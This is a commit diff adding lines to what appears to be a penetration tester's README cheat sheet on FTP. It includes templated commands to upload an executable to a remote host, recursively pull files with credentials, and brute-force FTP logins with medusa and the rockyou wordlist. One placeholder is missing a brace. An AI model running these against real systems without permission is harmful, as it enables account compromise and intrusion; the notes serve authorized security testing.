Update README.md

This commit is contained in:
Joe Totes
2022-10-21 10:55:49 -04:00
committed by GitHub
parent 986b8ca527
commit d4dafa4cbb

View File

@@ -158,6 +158,11 @@ ftp-upload -h {RHOST} -u 'anonymous' --password '' -d '/' {file.exe}
# Recursively download ftp directory
wget -r ftp://{USERNAME}:{PASSWORD@{IP ADDRESS}/
# Note - If FTP is hung up on viewing directory, ex.: ftp>dir 229 Entering Extended Passive Mode (|||52924|)
ftp> passive
ftp> espv
ftp> ls
# Brute force FTP
medusa -h {IP ADDRESS} -u {USER} -P /usr/share/wordlists/rockyou.txt -M ftp -t 10